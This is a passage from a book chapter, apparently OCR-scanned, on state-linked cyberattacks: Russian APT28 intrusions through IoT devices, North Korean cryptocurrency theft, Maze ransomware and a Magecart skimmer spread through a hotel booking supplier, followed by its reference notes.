The IoT’s growing importance

The Russian model of cyber as an economic and political weapon involves cyberattack in various forms, denial that they are responsible, placing the blame on others, especially proxies, and using cyberwarfare to produce economic, political, social and infrastructural physical damage. Their whole

IP theft and cyberwarfare 25 modus operand! relies on stealth, deceit, denial and blaming others. This means they choose cyber mechanisms that are not easy to detect and that are indirect in nature.

Therefore, an increasing use of the loT, as mentioned in Chapter 1, is taking place. A prime example occurred in April 2019 when Microsoft reported an incident through its Threat Intelligence Center that an loT cyberattack had been carried out through Voice Over Internet Protocol, a printer and video decoder. The loT devices provided soft access to a number of locations in the wider corporate network. Two of the three devices had factory security settings while the third had not been updated as yet.

Microsoft noted the cyberattack bore the hallmarks of Russian hackers who are linked to the GRU using a variety of names such as Fancy Bear, APT28 and Strontium. This group of Russian state hackers have been active since 2007 as outlined above but since April 2019 Microsoft noticed that the direction of their cyberattack focus changed to loT. It is usually thought that hackers target smartphones and computers for easy access to data and information or implanting malicious devices but it is more often that cameras, printers and decoders offer the soft access. The point of access to these devices are default passwords or passwords that are not updated. With the security not updated, the hackers create a beachhead that is their starting point for entering the unprotected corporate networks. Once the hacker has established a firm access to the network, a simple scan of the network for additional insecure devices allows them to move to more high-value accounts offering data and other privileged information. From there, the hackers move from one device to another, all the while mapping the network and communicating with command and control services.

Microsoft has been observing an increase in global activity from the Russian state hackers. Since the initial cyberattack Microsoft has notified 1,400 recipients who have been compromised by APT28 or Fancy Bear. Of those targeted 20% have been think-tanks such as European Values mentioned above, politically affiliated organisations and NGOs. The remainder, which comprises 80% of the cyberattacks, includes, among others, education, technology, engineering, medicine, the military, Olympic organisers, anti-doping agencies and the hospitality industry. In 2018, the FBI took action to disrupt a Fancy Bear campaign named VPNFilter, which targeted network storage devices and routers with malware that had the destructive capacity of ‘bricking’ devices through deleting firmware and rendering the devices useless. This campaign targeted the Ukraine in particular, which is often the target of Russian state hackers.12

As loT devices rapidly increase and less sophisticated, low-technology devices become the entry point for skilled hackers, in this case Russian state actors, the severity of the cyberattack/cyberwarfare continues. The extent of this cyber risk in relation to loT was demonstrated when security researchers at Armis found that VxWorks, the operating system that powers all the loT devices globally, had vulnerabilities in multiple zero-day areas. This disclosuremeant that the low-technology devices connected in loT such as firewalls, medical equipment such as telemedicine platforms, and printers could as described above produce soft access points to corporate networks, which would render multiple layers of security useless.

Microsoft noted that part of the problem is that loT devices are just interconnected facilitators with little if no management oversight. How many companies hire staff to look after the vulnerabilities of their printers? In fact Microsoft noted that most of their customer IT operations do not know that their simple devices are connected to the internet. Worse, a network analysis showed that the loT devices are subject to external control and command, which allows ingress from hackers hunting further access points. Microsoft made this disclosure to alert companies to the cyber risks they face especially as the number of loT devices are far in excess of personal computers (PCs) and mobile phones combined. The sectors particularly vulnerable to cyberattack to be covered in this book will also be assessed in terms of loT vulnerability as in my previous book on managing cyber risk in the financial sector.13

There have been warnings for years from cybercrime experts that even the humble office coffee machine can be a target of cybercriminals because of the ease of entry and also it is cheap for criminals to buy ransomware from dark web sites. In such cases it is even possible to buy one ransomware, get one free and share profits with the people have written the code. Jamie Bartlett, Director of the Centre for Analysis of Social Media at Demos, noted the loT is so poorly designed that it could in the future become possible to be forced to pay a small ransom in cryptocurrency to obtain coffee from the office coffee machine.14

Cryptocurrencies – another cyber risk

Cryptocurrencies present another opportunity for cyber hackers whether state actors or individuals to flourish. The seemingly innocent alternative currency system provides cover for a whole host of cybercriminals.

A prime example is the North Korean state actors who use increasingly sophisticated means to procure finance through cyberattack/cyberwarfare. A recent UN report outlined the ways in which North Korean state-backed cyber hackers have stolen at least US$ 2 billion from financial institutions and in cryptocurrencies. Such monies, which are either regulated by global nation-states or unregulated speculators in the case of cryptocurrencies, are used to build WMD and missiles to threaten their enemies around the world except for its backer Mainland China. The UN report is 33 pages in length with 192 annexes that chronicle at least 35 examples of North Korean state actors stealing monies from financial institutions and cryptocurrencies. This is in addition to stealing IP blueprints from advanced missile-producing countries globally. Cryptocurrencies are preferred targets for cyber theft because according to the UN report they are harder to trace, not being subject to

IP theft and cyberwarfare 27 regulation and oversight by different countries’ central banking systems. Such illegal transfer of funds from countries outside North Korea is facilitated by 30 overseas North Korean banking outlets.15

The advance in cryptocurrency use is facing many hurdles in the case of Mark Zuckerberg, CEO of Facebook, trying to launch a new cryptocurrency entitled Libra. This move has been met with scepticism given the criticisms of how Facebook was used by the Russians to bias the 2016 American presidential election towards Donald Trump through social media.

There have been moves by countries that have rogue dictators as leaders and small island countries to also issue cryptocurrencies, which would boost their economies and also allow dictatorships such as North Korea to launder money from ill-gotten gains. Venezuela has tried unsuccessfully to launch a sovereign cryptocurrency, the petro but it has failed. The government of the small Marshall Islands has launched in 2018 a SOV Development Fund to create a cryptocurrency named the SOV. The government has passed a bill in the legislature to support the SOV as it would raise much-needed revenue for the islanders who have suffered from a US crackdown on money laundering, which has raised compliance fees and most banks no longer wish to operate in the Marshall Islands. With the SOV the Marshall Islands can send their own money directly without using the global banking system. The problem is when recipients try to convert the SOV into dollars or other local currencies. In addition the International Monetary Fund and the US Treasury have raised concerns that such SOV-based revenue building could come at a high cost to the Marshall Islands’ reputation and money-laundering risks. The Marshall Islands government in turn has argued that the SOV will be tamper proof and allow for lower-cost compliance to be instituted.16

Cryptocurrencies are becoming less attractive in mainstream markets because of the risks they pose and their use by cybercriminals especially increasingly in relation to ransomware attacks. UK marine engineering firm London Offshore Consultants (LOC) were hacked by a group called Maze who claimed they stole 300GB of data and leaked some of this online to pressure LOC to pay the ransom to unlock their frozen computers. Early in December 2019 the FBI had warned that Maze ransomware attacks had been identified since November of that year, often posing as US government agencies, stealing data, then encrypting it to be able to extort victims further. One of the multiple methods Maze used was their own creation of a malicious, fake cryptocurrency site in addition to malspam to impersonate government agencies.17

Supply-chain cyberattack entry

Another route for obtaining data, IP theft and the implantation of malware that has not been given adequate attention by companies leading to indirect breaches from both individuals and state actors is through supply chains. Most companies large and small, as well as government agencies, rely on someform of supply chain, which is required for both products and services. In fact, the larger the company the more it relies on supply chains. A recent example involves two hotel chains, one with 107 hotels in 14 countries and the other with 73 hotels in 14 countries worldwide. A Magecard skimming campaign compromised the hotels’ mobile websites through a third-party supply chain. Trend Micro researchers found that hackers had targeted Roomleader based in Barcelona implanting a malicious Javascript. Roomleader offers digital marketing and website development services assisting hospitality companies with their booking functions through a library module named ‘viewedhotels’, which serves to save viewed hotel information in guests’ browser cookies. In line with the usual Magecart attacks the skimmer was designed to glean information and data concerning guests’ contact details such as e-mail addresses, credit card details and room preferences. In this case the skimmer card was constructed to only target mobile website use and not those who had utilised their PCs. Desktop users in fact were sent booking information using the normal Javascript. Joseph Chen, the fraud researcher at Trend Micro, suggested that mobile websites were targeted because they were not protected by the usual PC security software and were easier to enter while escaping detection. The hackers replaced the hotel payment forms with their own slightly different version but translated them into eight different languages like the original payment forms to help avoid detection. Additionally, many hotels do not ask guests for their Card Verification Code (CVC) doing so when the guests arrive. In their replacement payment forms they were sure to request guest CVC security codes.18

A recent survey by Microsoft and insurance company Marsh, significant companies in both producing computers and insuring their use, reported that company leaders have become even more concerned about the rapid increase in cyberattack. Yet, these business leaders and executives are even less confident than they were in dealing with such cyber risks.19


  • 1 ‘Good for Google, bad for America’, Peter Thiel, New York Times (1 August 2019).
  • 2 ‘Cybercrime and espionage go hand in hand as groups target healthcare and video game world’, Erin Ayers, Advisen Cyber News, Digest Edition (8 August 2019).
  • 3 ‘Beijing hackers moonlight for cash’, Boer Deng, The Times (9 August 2019).
  • 4 ‘Chinese hackers “turned” US spy tools on West’, Boer Deng, The Times (8 May 2019).
  • 5 ‘Huawei says without evidence that U.S. pressured its employees’, Raymond Zhong, New York Times (3 September 2019).
  • 6 ‘North Korea “stole $2bn for weapons via cyber-attacks’”, BBC News Online (7 August 2019). See
  • 7 ‘Russia suspected by some in giant Bulgarian hack’, Marc Santora and Eric Schmitt, New York Times (14 August 2019).
  • 8 ‘Episode 13: “The Blueprint”’, Producer/Director John Marks, New York Times (6 September 2019).

IP theft and cyberwarfare 29 ‘European Values Think-Tank among 30 Russian watchers targeted by the most sophisticated cyber attack ever done on ProtonMail, probably by the GRU’, press release, European Values (14 August 2019). N.B. Technical details of this cyberattack were made public by Bellingcat.

‘Cyber attack on Ministry of Foreign Affairs’, Naveen Goud, Cybersecurity Insiders. See

‘Iranian hackers targeted presidential campaign, Microsoft says’, Nicole Perlroth, New York Tinies (4 October 2019).

‘Microsoft warns Russian hackers can breach secure networks through simple loT devices’, Zak Dofi'man, Forbes (5 August 2019). ‘Russian hacks are infiltrating companies through the office printer’, MIT Technology Review Computing (5 September 2019).

‘Microsoft warns Russian hackers can breach secure networks through simple loT devices’. Zak Dofi'man, Forbes (5 August 2019). Ruth Taplin (ed.), Managing Cyber Risk in the Financial Sector: Lessons from Japan, Europe and the USA, Abingdon: Routledge, 2016.

‘It’s time to wake up and smell coffee on cybercrime’, Alexandra Frean, The Times (16 November 2017).

‘North Korea skirted U.N. sanctions and earned USS 2 billion using cyberattacks, a new U.N. Report says’, Pamela Falk, CBS News (6 August 2019).

‘North Korea stole 2 billion hacking financial bodies - UN report’, MIT Technology Review Computing (5 September 2019).

‘London Offshore Consultants suffers ransomware attack’, Sam Chambers, Splash 24/7 (31 January 2020).

‘Hotel websites infected with skimmer via supply chain attack’, Bradley Barth, SC Media (18 September 2019).

‘Businesses more concerned about cyber risks, but less confident in ability to manage it: Marsh’, Erin Ayers, Advisen Cyber News, Digest Edition (19 September 2019).

< Prev   CONTENTS   Source   Next >